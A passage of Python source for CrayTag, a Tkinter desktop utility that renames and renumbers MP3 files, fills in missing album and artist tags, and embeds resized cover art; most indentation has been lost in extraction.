cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('album'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('front'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('back'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cover==None:
cover=path+'/'+covers[0]
albums=[]
data=[] # Meaning Filenames.
artists=[]
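# Group this folder's mp3s by their album tag: albums[i] is the tag text, data[i] the filenames carrying it, and artists[i] the artist tags seen for it.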
for t in mp3s:
if ram.KillThread:
ravage()
return
aus=eyed3.load(path+'/'+t)
alb=str(aus.tag.album)
if alb in albums:
c=albums.index(alb)
data[c].append(t)
artists[c].append(str(aus.tag.artist))
else:
albums.append(alb)
data.append([t])
artists.append([aus.tag.artist])
c=0
for t in data:
data[c].sort()
c+=1
if albums==[]:
return
if len(albums)!=1:
thebes=True
else:
thebes=False
c=0
newFnames=[]
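# Rename every file in each album to its renumbered form. The reno() helper (defined elsewhere in this script) returns the new filenames in the same order as the sorted originals.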
for t in data:
if ram.KillThread:
ravage()
return
egypt=t
egypt.sort()
if egypt==[]:
print('Error: Nimue')
ram.LiveFeedback='Error: Nimue'
return
faith=reno(egypt)
cv=0
for b in egypt:
os.rename(path+'/'+b,path+'/'+faith[cv])
if os.path.isfile(path+'/'+faith[cv]) == False:
print('Issue H2O',path+'/'+faith[cv])
ram.LiveFeedback='Issue H2O '+path+'/'+faith[cv]
return
cv+=1
newFnames.append(faith)
c=0
if ram.NotifyMissingAlbumName:
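# For any album whose name tag is missing, pop up the handler() dialog and use whatever the user typed (taffy.dataToReturn) as the album name.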
for t in albums:
if t=='None' or t==None:
handler([artists[c][0],'\n'.join(data[c])],'name')
gdi=taffy.dataToReturn
if gdi==None or gdi=='' or gdi=='None':
pass
else:
albums[c]=str(gdi)
c+=1
c=0
if ram.NotifyMissingArtist:
for t in artists:
check=True
for v in t:
if v!='None' and v!= None:
check=False
if check:
handler([albums[c],'\n'.join(data[c])],'artist')
gdi=taffy.dataToReturn
if gdi==None or gdi=='' or gdi=='None':
pass
else:
artists[c]=[str(gdi)]
c+=1
c=0
for t in newFnames:
if ram.KillThread:
ravage()
return
found=None # Will hold album cover path
addCover=True # This will determine if cover was found or not.
if thebes: # This means more than one album, so individual covers must be extracted.
for v in t:
try:
tag = TinyTag.get(path+'/'+v,image=True)
photor=tag.get_image()
if photor == '' or photor == None or len(photor) < 10:
found=None
else:
found=photor
break
except:
found=None
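# At this point found holds raw embedded image bytes pulled out with TinyTag, or None if no track carried usable art.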
if found==None and ram.NotifyMissingCover: # This should call the missing data setter if checked.
dirTree.A=str(path)
handler([albums[c],artists[c][0],'\n'.join(t)],'cover')
found=taffy.dataToReturn
else:
try:
if ram.KeepBackup:
grey=open(path+'/'+'cover.jpg','wb')
grey.write(found)
grey.close()
found=path+'/'+'cover.jpg'
else:
found=None
except:
found=None
if os.path.isfile(str(found)):
try:
if ram.KeepBackup:
im = Image.open(found)
im.save(path+'/'+'cover.jpg','JPEG')
addCover=True
else:
found=None
addCover=False
except:
addCover=False
else:
addCover=False
else: # This is for singular albums.
if cover==None or os.path.isfile(cover)==False:
for v in t:
try:
tag = TinyTag.get(path+'/'+v,image=True)
photor=tag.get_image()
if photor == '' or photor == None or len(photor) < 10:
found=None
else:
found=photor
break
except:
found=None
if found==None and ram.NotifyMissingCover: # This should call the missing data setter if checked.
handler([albums[c],artists[c][0],'\n'.join(t)],'cover')
found=taffy.dataToReturn
else:
try:
if ram.KeepBackup:
grey=open(path+'/'+'cover.jpg','wb')
grey.write(found)
grey.close()
found=path+'/'+'cover.jpg'
else:
pass
except:
found=None
if os.path.isfile(str(found)):
try:
if ram.KeepBackup:
im = Image.open(found)
im.save(path+'/'+'cover.jpg','JPEG')
addCover=True
else:
addCover=True
except:
addCover=False
else:
addCover=False
else:
found=cover
addCover=True
''' < This should set the new Data > '''
trackC=1 # Track count.
inhibit=None
debt=True
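# trackC numbers the tracks as they are written. inhibit remembers which album the cached temp-vox.jpg belongs to, and debt forces that resized cover to be (re)built for the first track of each album.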
if found != None and os.path.isfile(found):
if ram.DontResiveJPG:
try:
if ram.KeepBackup:
im = Image.open(found)
size = ram.ResizeAlbumCoverSize
im.thumbnail(size, Image.ANTIALIAS)
im.save(found,'JPEG')
else:
pass
except:
print('Turbin Error')
ram.LiveFeedback='Turbin Error'
found=None
class coo:
imagedata=None
for F in t: # F == filename.
if ram.KillThread:
ravage()
return
try:
aus=eyed3.load(path+'/'+F)
if ram.DeleteEmbedded:
try:
for t in [y.description for y in aus.tag.images]:
aus.tag.images.remove(t)
except:
print('Cola Error')
ram.LiveFeedback='Cola Error'
if addCover and ram.WillEmbedArt: # For cover.
try:
if debt:
debt=False
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince')
ram.LiveFeedback='Erra Prince'
inhibit=str(albums[c])
im = Image.open(found)
size = ram.ResizeAlbumCoverSize
im.thumbnail(size, Image.ANTIALIAS)
im.save(ex.tide+'/'+'temp-vox.jpg','JPEG')
coo.imagedata = open(ex.tide+'/'+'temp-vox.jpg',"rb").read()
if inhibit == str(albums[c]):
for t in [y.description for y in aus.tag.images]:
aus.tag.images.remove(t)
aus.tag.images.set(3,coo.imagedata,"image/jpeg")
else:
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince2')
ram.LiveFeedback='Erra Prince2'
inhibit=str(albums[c])
im = Image.open(found)
size = ram.ResizeAlbumCoverSize
im.thumbnail(size, Image.ANTIALIAS)
im.save(ex.tide+'/'+'temp-vox.jpg','JPEG')
coo.imagedata = open(ex.tide+'/'+'temp-vox.jpg',"rb").read()
for t in [y.description for y in aus.tag.images]:
aus.tag.images.remove(t)
aus.tag.images.set(3,coo.imagedata,"image/jpeg")
except:
print('Erra: JING')
ram.LiveFeedback='Erra: JING'
aus.tag.album=str(albums[c])
ram.LiveFeedback='Processing Album: '+str(albums[c])
if ram.KillThread:
ravage()
return
try:
if artists[c][0]=='None' or artists[c][0]==None or artists[c][0]=='':
aus.tag.comments.set(str(albums[c]))
else:
aus.tag.comments.set(str(artists[c][0]))
except:
print('Erra Mohigo')
ram.LiveFeedback='Erra Mohigo'
if str(aus.tag.artist)=='None' or str(aus.tag.artist)=='':
vin = 'None'
for k in artists[c]:
if k=='None' or k=='' or k==None:
pass
else:
vin=str(k)
break
try:
aus.tag.album_artist=vin
aus.tag.artist=vin
aus.tag.composer=vin
aus.tag.original_artist=vin
aus.tag.publisher=vin
aus.tag.copyright=vin
except:
print('Erra kiosk')
ram.LiveFeedback='Erra Kiosk'
else:
vin = 'None'
for k in artists[c]:
if k=='None' or k=='' or k==None:
pass
else:
vin=str(k)
break
try:
aus.tag.publisher=vin
aus.tag.copyright=vin
except:
print('Erra vinmo')
ram.LiveFeedback='Erra vinmo'
if ram.ChangeAllGenres:
try:
aus.tag.genre=str(ram.GenreToChangeTo)
aus.tag.non_std_genre=str(ram.GenreToChangeTo)
except:
print('Erra halo')
ram.LiveFeedback='Erra halo'
aus.tag.track_num = trackC
trackC+=1
aus.tag.save()
ram.files+=1
except:
print('Erra Shim')
ram.LiveFeedback='Erra Shim'
c+=1 # This must go to end of this for loop.
try:
crawler(path) # This always at end of masterLoop(). Above return statement.
except:
ram.LiveFeedback='Done! Due to an Error or Bad Folder Path.'
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince5')
return
ram.LiveFeedback='Done! Processed '+str(ram.files)+' mp3s.'
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince')
return
class vera:
a=None
def callMaster():
masterLoop(vera.a)
class dome:
x=None # dome.x
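# vera.a carries the folder chosen in the GUI to callMaster(), which runs masterLoop() on a worker thread; dome.x holds that Thread object so the progress window can join it when processing finishes.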
def multiplex():
class nim:
ue=None
nim.ue=tkinter.Tk()
root=nim.ue
background_image2=tkinter.PhotoImage(data = img.D)
root.iconphoto(False, background_image2)
class hepa:
a=True
def van():
rootx=Toplevel(nim.ue)
background_image3=tkinter.PhotoImage(data = img.D)
rootx.iconphoto(False, background_image3)
def fum():
hepa.a=True
rootx.destroy()
rootx.protocol('WM_DELETE_WINDOW', fum)
rootx.title('Alert!')
w = 150
h = 100
ws = rootx.winfo_screenwidth()
hs = rootx.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
rootx.geometry('%dx%d+%d+%d' % (w, h, x, y))
rootx.resizable(0, 0)
rootx.configure(background='#0066ff')
def knox():
rootx.destroy()
ram.KillThread=True
time.sleep(1)
root.destroy()
hepa.a=True
mainCat('Ended Processing Early Per User Request!')
cy = tkinter.Button(rootx,text ="Yes",command=knox,anchor='c',font=('Helvetica', 12, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
cy.pack()
cy.place(bordermode=OUTSIDE, height=25, width=75,relx=0.5, rely=1.0, anchor=SE)
def cruella():
rootx.destroy()
hepa.a=True
cy2 = tkinter.Button(rootx,text ="No",command=cruella,anchor='c',font=('Helvetica', 12, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
cy2.pack()
cy2.place(bordermode=OUTSIDE, height=25, width=75,relx=1, rely=1.0, anchor=SE)
at4 = Label(rootx,wraplength=150, fg='black',bg='#0066ff',text='Stop Running Processes?',justify=LEFT,font=('Helvetica', 14, 'bold'))
at4.place(bordermode=OUTSIDE,height=75, width=600,relx=0.5, rely=0.0, anchor=N)
rootx.mainloop()
def zayu():
if hepa.a:
hepa.a=False
van()
root.protocol('WM_DELETE_WINDOW', van)
def upS():
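# Poll ram.LiveFeedback every 3 seconds; once the worker reports a message starting with 'Done!', tear down the progress window, join the thread and return to the main screen.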
if ram.LiveFeedback.startswith('Done!'):
try:
rootx.destroy()
except:
pass
root.destroy()
dome.x.join()
mainCat(ram.LiveFeedback)
return
d.config(text=ram.LiveFeedback)
root.after(3000,upS)
def mecca():
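# Kick off the tag-processing worker on a background thread and start the status polling loop.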
ram.LiveFeedback='Initializing!'
dome.x = threading.Thread(target=callMaster)
dome.x.start()
upS()
root.title('Processing Files.')
w = 600
h = 100
ws = root.winfo_screenwidth()
hs = root.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.resizable(0, 0)
root.configure(background='#000099')
backg=tkinter.PhotoImage(data = img.C)
at = Label(root, bg='#2d00b3',image=backg)
at.place(bordermode=OUTSIDE,height=70, width=600,relx=0, rely=0.0, anchor=NW)
d = Label(root, text='Initializing.',anchor='w',relief=SUNKEN,fg='black',bg='cyan',highlightbackground="#000066", highlightcolor="#0000ff", highlightthickness=4,font=('Helvetica', 13,'bold'))
d.place(bordermode=OUTSIDE, height=30, width=600,relx=0.5, rely=1, anchor=S)
root.after(100,mecca)
root.mainloop()
def colaC(temp):
vera.a=temp
multiplex()
class nim:
indo=None # nim.indo
rt=None # nim.rt
def settings():
ram.coffee=True
ram.rt=Toplevel(nim.rt)
def vine():
ram.rt.destroy()
ram.coffee=None
nim.indo.config(text='Settings closed; no settings saved.')
ram.rt.protocol('WM_DELETE_WINDOW', vine)
ram.rt.title('Settings')
w = 600
h = 400
ws = ram.rt.winfo_screenwidth()
hs = ram.rt.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
ram.rt.geometry('%dx%d+%d+%d' % (w, h, x, y))
ram.rt.resizable(0, 0)
ram.rt.configure(background='#0066ff')
bw = tkinter.Text(ram.rt,relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12),insertbackground='#000066')
bw.pack()
bw.place(bordermode=OUTSIDE, height=100, width=600,relx=0, rely=0.20, anchor=NW)
class nuw:
nu=True
class nuw2:
nu=True
if ram.CoversToSearchFor==None or ram.CoversToSearchFor=='' or ram.CoversToSearchFor==[]:
bw.insert("1.0", "Cover.jpg\nFolder.jpeg\nArt.jpg")
else:
bw.insert("1.0",'\n'.join(ram.CoversToSearchFor))
nuw.nu=False
def mp2(cdf):
if nuw.nu:
nuw.nu=False
bw.delete('1.0',END)
bw.bind('<Button-1>',mp2)
bw.bind('<Button-2>',mp2)
bw.bind('<Button-3>',mp2)
bw2 = tkinter.Text(ram.rt,relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12),insertbackground='#000066')
bw2.pack()
bw2.place(bordermode=OUTSIDE, height=100, width=600,relx=0, rely=0.65, anchor=NW)
if ram.FilesToDelete==None or ram.FilesToDelete=='' or ram.FilesToDelete==[]:
bw2.insert("1.0", "Example.txt\nJunk.jpg\nUnused File.dat\nGarbage.file")
else:
bw2.insert("1.0",'\n'.join(ram.FilesToDelete))
nuw2.nu=False
def mp22(cdf):
if nuw2.nu:
nuw2.nu=False
bw2.delete('1.0',END)
bw2.bind('<Button-1>',mp22)
bw2.bind('<Button-2>',mp22)
bw2.bind('<Button-3>',mp22)
a23 = Label(ram.rt, fg='cyan',bg='#290066',text='Album Cover Names.',wraplength=130,font=('Helvetica', 14, 'bold'),justify=LEFT)
a23.place(bordermode=OUTSIDE,height=80, width=130,relx=0.0, rely=0.0, anchor=NW)
a232 = Label(ram.rt, fg='cyan',bg='#290066',wraplength=470,text='Enter the name or names of the JPEG image files for the program to look for. If your album cover is named cover.jpg the program will look for that filename in the directory it is scanning. The program scans each folder separately, so it will look for a different cover in each folder containing mp3 files. Place each image name on a separate line as shown below.',font=('Helvetica', 10, 'bold'),justify=LEFT)
a232.place(bordermode=OUTSIDE,height=80, width=470,relx=1.0, rely=0.0, anchor=NE)
a24 = Label(ram.rt, fg='cyan',bg='#290066',wraplength=130,justify=LEFT,text='Delete These Files.',font=('Helvetica', 14, 'bold'))
a24.place(bordermode=OUTSIDE,height=80, width=130,relx=0.0, rely=0.45, anchor=NW)
a242 = Label(ram.rt, fg='cyan',bg='#290066',wraplength=470,justify=LEFT,text='You can specify files for the program to delete while it is scanning your files. For example, maybe you have unused files in each folder and want to batch delete them. Enter each filename you want deleted, one per line, as demonstrated below. By default the program does not delete anything unless you specify it to do so. No worries.',font=('Helvetica', 10, 'bold'))
a242.place(bordermode=OUTSIDE,height=80, width=470,relx=1.0, rely=0.45, anchor=NE)
def saveS():
if nuw.nu and nuw2.nu:
ram.rt.destroy()
ram.CoversToSearchFor=None
ram.FilesToDelete=None
nim.indo.config(text='Settings closed; no settings saved.')
ram.coffee=None
return
if nuw.nu == False and bw.get('1.0',END).replace('\n','').replace('\t','').strip() != '':
A=bw.get('1.0',END).strip().replace('\t','') # Album covers to search for.
if '\n' in A:
A=A.split('\n')
temp=[]
for t in A:
if t.strip()!='' and '.jp' in t.strip().lower():
if t.strip().lower().endswith('.jpg') or t.strip().lower().endswith('.jpeg'):
temp.append(str(t.strip().lower()))
if temp!=[]:
A=temp
else:
A=None
else:
if A.strip()!='' and '.jp' in A.strip().lower():
if A.strip().lower().endswith('.jpg') or A.strip().lower().endswith('.jpeg'):
A=[A.lower()]
else:
A=None
else:
A=None
if A!=None:
ram.CoversToSearchFor=A
else:
ram.CoversToSearchFor=None
else:
ram.CoversToSearchFor=None
if nuw2.nu == False and bw2.get('1.0',END).replace('\n','').replace('\t','').strip() != '':
A=bw2.get('1.0',END).strip() # Files to delete.
if '\n' in A:
A=A.split('\n')
temp=[]
for t in A:
if t.strip()!='':
temp.append(str(t.strip().lower()))
if temp!=[]:
A=temp
else:
temp=None
A=None
else:
A=[A.lower()]
if A!=None:
ram.FilesToDelete=A
else:
ram.FilesToDelete=None
else:
ram.FilesToDelete=None
ram.rt.destroy()
nim.indo.config(text='Settings Saved.')
ram.coffee=None
return
e4 = tkinter.Button(ram.rt,command=saveS,text ="Save Settings",anchor='c',font=('Helvetica', 14, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
e4.pack()
e4.place(bordermode=OUTSIDE, height=39.5, width=600,relx=1.0, rely=1.0, anchor=SE)
background_image7=tkinter.PhotoImage(data = img.D)
ram.rt.iconphoto(False, background_image7)
ram.rt.mainloop()
def star():
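# Reset every per-run option to its default before the main window is (re)built.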
ram.NotifyMissingArtist=True
ram.NotifyMissingCover=True
ram.NotifyMissingAlbumName=True
ram.RenumberFilenames=True
ram.ResizeAlbumCoverSize=480,480
ram.ChangeAllGenres=False
ram.GenreToChangeTo="Pop"
ram.files=0
ram.rt=None
ram.coffee=None
ram.DontResiveJPG=False
ram.WillEmbedArt=True
ram.KeepBackup=True
ram.DeleteEmbedded=True
def mainCat(indo):
star()
nim.rt=tkinter.Tk()
root=nim.rt
root.withdraw()
root.config(background="#2d00b3")
def vin():
root.destroy()
try:
ram.rt.destroy()
except:
pass
ravage()
root.protocol('WM_DELETE_WINDOW', vin)
root.title('CrayTag '+ver.sion)
w = 600
h = 400
ws = root.winfo_screenwidth()
hs = root.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.resizable(0, 0)
root.configure(background='#2d00b3')
can=tkinter.Canvas(root)
back=tkinter.PhotoImage(data = img.Q)
a = Label(root, bg='#2d00b3',image=back)
a.place(bordermode=OUTSIDE,height=200, width=400,relx=0, rely=0.0, anchor=NW)
back2=tkinter.PhotoImage(data = img.B)
a2 = Label(root, bg='#2d00b3',image=back2)
a2.place(bordermode=OUTSIDE,height=70, width=108,relx=0.483, rely=0.565, anchor=NW)
def Pompeii(rtds):
if ram.coffee==None:
nim.indo=d
settings()
else:
return
a2.bind('<Button-1>',Pompeii)
a2.bind('<Button-2>',Pompeii)
a2.bind('<Button-3>',Pompeii)
b = tkinter.Text(root,relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12),insertbackground='#000066')
b.pack()
b.place(bordermode=OUTSIDE, height=25, width=300,relx=0, rely=0.5, anchor=NW)
b.insert("1.0", "Type or Select Path of Folder to Process.")
class nu:
nu=True
def mp(cdf):
if nu.nu:
nu.nu=False
b.delete('1.0',END)
d.config(text='Type or Select Path to Folder with Files to Process.')
b.bind('<Button-1>',mp)
b.bind('<Button-2>',mp)
b.bind('<Button-3>',mp)
def browser():
temp=browse_button()
if str(temp)=='':
d.config(text='Must Select a Valid Path!')
else:
if os.path.isdir(temp):
nu.nu=False
d.config(text='Path Selected.')
b.delete('1.0',END)
b.insert('1.0',str(temp))
c = tkinter.Button(root,text ="Browse",command=browser,anchor='c',font=('Helvetica', 12, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
c.pack()
c.place(bordermode=OUTSIDE, height=25, width=100,relx=0.5, rely=0.5, anchor=NW)
d = Label(root, text=indo,anchor='w',relief=SUNKEN,fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#0000ff", highlightthickness=4,font=('Helvetica', 11))
d.place(bordermode=OUTSIDE, height=33, width=397,relx=0, rely=1, anchor=SW)
class dui:
b=0
c=['Invalid','Incorrect','Wrong']
d=True
def smo():
temp=b.get('1.0',END)
temp=temp.replace('\n','').replace('\t','')
temp=temp.strip()
if temp=='' or temp=="Type or Select Path of Folder to Process.":
d.config(text='Must Specify Path! Try using Browse Button!')
return
if os.path.isdir(temp)==False:
if dui.d==True:
dui.d=False
d.config(text='Path is '+random.choice(dui.c))
dui.b=random.randint(0,5)
elif dui.b==1:
d.config(text='Path is Still '+random.choice(dui.c))
dui.b=random.randint(0,5)
elif dui.b==2:
d.config(text='Path is Still '+random.choice(dui.c)+'!')
dui.b=random.randint(0,5)
elif dui.b==3:
d.config(text='Darling, the Path is Still '+random.choice(dui.c)+'?')
dui.b=random.randint(0,5)
elif dui.b==4:
d.config(text=random.choice(['Darling!','Hmm?','Sorry!','Ugh!','Bleh!','Yuck!','Nope!','Nah!','Honey!','Shockingly!'])+' the Path is Still '+random.choice(dui.c)+'.')
dui.b=random.randint(0,5)
else:
d.config(text=random.choice(['Darling','Sorry','Ugh','Bleh','Yuck','Nope','Nah','Honey','Shockingly'])+' the Path is Still '+random.choice(dui.c)+'.')
dui.b=random.randint(0,5)
return
dui.d=True
try:
ram.rt.destroy()
except:
pass
try:
root.destroy()
except:
print('V2 error')
ram.rt=None
ram.KillThread=False
colaC(temp)
e = tkinter.Button(root,command=smo,text ="Start",anchor='c',font=('Helvetica', 14, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
e.pack()
e.place(bordermode=OUTSIDE, height=80, width=204,relx=1.0, rely=1.0, anchor=SE)
f = Label(root, text='Notify to Add Missing Album Artist',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
f.place(bordermode=OUTSIDE, height=25, width=250,relx=0, rely=0.562, anchor=NW)
g = Label(root, text='Notify to Add Missing Album Cover',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
g.place(bordermode=OUTSIDE, height=25, width=250,relx=0, rely=0.622, anchor=NW)
h = Label(root, text='Notify to Add Missing Album Name',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
h.place(bordermode=OUTSIDE, height=25, width=250,relx=0, rely=0.682, anchor=NW)
i = Label(root, text='Resize Album Cover to:',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
i.place(bordermode=OUTSIDE, height=25, width=170,relx=0, rely=0.742, anchor=NW)
choices = ['25x25','50x50','75x75','100x100','125x125','150x150','160x160','175x175','200x200','250x250','300x300','350x350','400x400','480x480','500x500','600x600','700x700','800x800','900x900','1000x1000']
tkvar = StringVar(root)
def setter(kilo):
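# Parse the chosen 'WxH' entry into an (int, int) tuple used when resizing covers.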
temp=tkvar.get().split('x')
ram.ResizeAlbumCoverSize=(int(temp[0]),int(temp[1]))
d.config(text='Changed Cover Size to: '+' x '.join(temp))
popupMenu = OptionMenu(root, tkvar, *choices,command=setter)
popupMenu.config(relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu.place(bordermode=OUTSIDE, height=25, width=110,relx=0.28, rely=0.742, anchor=NW)
tkvar.set(choices[13])
j = Label(root, text='or Custom:',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
j.place(bordermode=OUTSIDE, height=25, width=90,relx=0.458, rely=0.742, anchor=NW)
def mull():
p.config(text=str(k.get()))
k = Spinbox(root, command=mull,from_=0, to=10000,relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
k.place(bordermode=OUTSIDE, height=25, width=60,relx=0.605, rely=0.742, anchor=NW)
def mulla(jhg):
mull()
k.bind('<KeyRelease>',mulla)
m = Label(root, text='x',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
m.place(bordermode=OUTSIDE, height=25, width=17,relx=0.705, rely=0.742, anchor=NW)
def setC():
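# Validate the spinbox value and store it as a square custom cover size.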
temp=k.get()
try:
temp=int(temp)
except:
d.config(text='Alert: Must Enter only Numbers For Cover Size!')
return
if temp<=0:
d.config(text='Alert: Cover Size Must be Greater than 0.')
return
else:
ram.ResizeAlbumCoverSize=temp,temp
d.config(text='Saved Custom Cover Size: '+str(temp)+' x '+str(temp))
o = tkinter.Button(root,text ="Save Custom",command=setC,anchor='c',font=('Helvetica', 11, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
o.pack()
o.place(bordermode=OUTSIDE, height=25, width=103,relx=1, rely=0.742, anchor=NE)
p = Label(root, text='0',relief=SUNKEN,anchor='w',fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
p.place(bordermode=OUTSIDE, height=25, width=59,relx=0.732, rely=0.742, anchor=NW)
def gray():
if str(chkValue.get()) == 'True':
ram.NotifyMissingArtist=True
d.config(text='Enabled Notify Missing Artist.')
else:
ram.NotifyMissingArtist=False
d.config(text='Disabled Notify Missing Artist.')
chkValue = tkinter.BooleanVar()
chkValue.set(True)
q = tkinter.Checkbutton(root, var=chkValue,command=gray,relief=SUNKEN,fg='#000099',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,activebackground='#b3b3ff',activeforeground='blue',font=('Helvetica', 12))
q.place(bordermode=OUTSIDE, height=25, width=40,relx=0.415, rely=0.562, anchor=NW)
def gray2():
if str(chkValue2.get()) == 'True':
ram.NotifyMissingCover=True
d.config(text='Enabled Notify Missing Cover.')
else:
ram.NotifyMissingCover=False
d.config(text='Disabled Notify Missing Cover.')
chkValue2 = tkinter.BooleanVar()
chkValue2.set(True)
q2 = tkinter.Checkbutton(root, var=chkValue2,command=gray2,relief=SUNKEN,fg='#000099',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,activebackground='#b3b3ff',activeforeground='blue',font=('Helvetica', 12))
q2.place(bordermode=OUTSIDE, height=25, width=40,relx=0.415, rely=0.622, anchor=NW)
def gray3():
if str(chkValue3.get()) == 'True':
ram.NotifyMissingAlbumName=True
d.config(text='Enabled Notify Missing Album Name.')
else:
ram.NotifyMissingAlbumName=False
d.config(text='Disabled Notify Missing Album Name.')
chkValue3 = tkinter.BooleanVar()
chkValue3.set(True)
q3 = tkinter.Checkbutton(root, var=chkValue3,command=gray3,relief=SUNKEN,fg='#000099',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,activebackground='#b3b3ff',activeforeground='blue',font=('Helvetica', 12))
q3.place(bordermode=OUTSIDE, height=25, width=40,relx=0.415, rely=0.682, anchor=NW)
r = Label(root, text='Renumber mp3 Filenames:',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
r.place(bordermode=OUTSIDE, height=25, width=195,relx=0, rely=0.802, anchor=NW)
def gray4():
if str(chkValue4.get()) == 'True':
ram.RenumberFilenames=True
d.config(text='Enabled Filename Renumbering.')
else:
ram.RenumberFilenames=False
d.config(text='Disabled Filename Renumbering.')
chkValue4 = tkinter.BooleanVar()
chkValue4.set(True)
q4 = tkinter.Checkbutton(root, var=chkValue4,command=gray4,relief=SUNKEN,fg='#000099',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,activebackground='#b3b3ff',activeforeground='blue',font=('Helvetica', 12))
q4.place(bordermode=OUTSIDE, height=25, width=40,relx=0.325, rely=0.802, anchor=NW)
choices2 = ['01 - Example.mp3','01-Example.mp3','01- Example.mp3','01 Example.mp3','01Example.mp3','01. Example.mp3','01.Example.mp3','01_Example.mp3','01_ Example.mp3','01:Example.mp3','01 : Example.mp3','01)- Example.mp3','01 ~ Example.mp3','01~ Example.mp3','01~Example.mp3']
tkvar2 = StringVar(root)
def setter2(kilo):
    # Separator strings parallel to the example filenames in choices2 above.
    divs=[' - ','-','- ',' ','','. ','.','_','_ ',':',' : ',')- ',' ~ ','~ ','~']
    if tkvar2.get() in choices2:
        maxx.div=divs[choices2.index(tkvar2.get())]
    else:
        print('Codfish Error')
    d.config(text='Set Renumber Style to: '+str(tkvar2.get()))
popupMenu2 = OptionMenu(root, tkvar2, *choices2,command=setter2)
popupMenu2.config(relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu2["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu2.place(bordermode=OUTSIDE, height=25, width=161,relx=0.392, rely=0.802, anchor=NW)
tkvar2.set(choices2[3])
